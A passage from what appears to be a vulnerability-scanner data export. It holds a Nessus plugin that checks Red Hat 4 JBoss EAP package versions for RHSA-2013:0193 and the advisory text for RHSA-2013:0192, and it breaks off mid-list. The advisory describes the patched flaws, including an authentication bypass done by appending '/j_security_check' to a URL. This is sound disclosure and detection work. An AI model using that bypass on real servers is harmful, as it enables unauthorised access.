Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0193\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL4\", rpm:\"jbossas-client-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL4\", reference:\"aopalliance-1.0-5.2.jdk6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"bsh2-2.0-0.b4.15.1.patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"google-guice-2.0-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-3.3.2-1.6.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-annotations-3.4.0-3.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-javadoc-3.3.2-1.6.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-search-3.1.1-2.3.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-search-javadoc-3.1.1-2.3.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hornetq-2.2.24-1.EAP.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"javassist-3.12.0-6.SP1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cache-pojo-3.0.1-1.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cl-2.0.11-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-common-beans-1.0.1-2.1.Final.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-common-core-2.2.21-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-transactions-1.0.2-1.4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-javaee-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jpa-deployers-1.0.0-6.SP2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-messaging-1.4.8-12.SP9.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-naming-5.0.3-5.CP02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-reflect-2.0.4-2.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-docs-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-examples-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-vfs2-2.2.1-2.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-5.2.0-14.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-client-5.2.0-14.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-hornetq-5.2.0-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-messaging-5.2.0-14.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-tp-licenses-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-ws-cxf-5.2.0-8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-ws-native-5.2.0-14.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbosssx2-2.0.5-8.3.SP3_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossts-4.6.1-12.CP13.8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jgroups-2.6.22-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-jboss-as-5-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"netty-3.2.5-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-federation-2.1.5-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rh-eap-docs-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rh-eap-docs-examples-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-common-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-client-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-comm-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-domain-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-gui-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-native-system-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-plugin-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-plugin-container-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-util-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-jboss-as-common-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-modules-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-platform-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-plugins-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"wss4j-1.5.12-4.2_patch_02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-security-1.5.1-2.ep5.el4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:03", "description": "Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": null, "vector": null}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 5 : JBoss EAP (RHSA-2013:0192)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:hornetq-native", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas", "p-cpe:/a:redhat:enterprise_linux:jbossas-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq", "p-cpe:/a:redhat:enterprise_linux:jbossas-messaging", "p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", 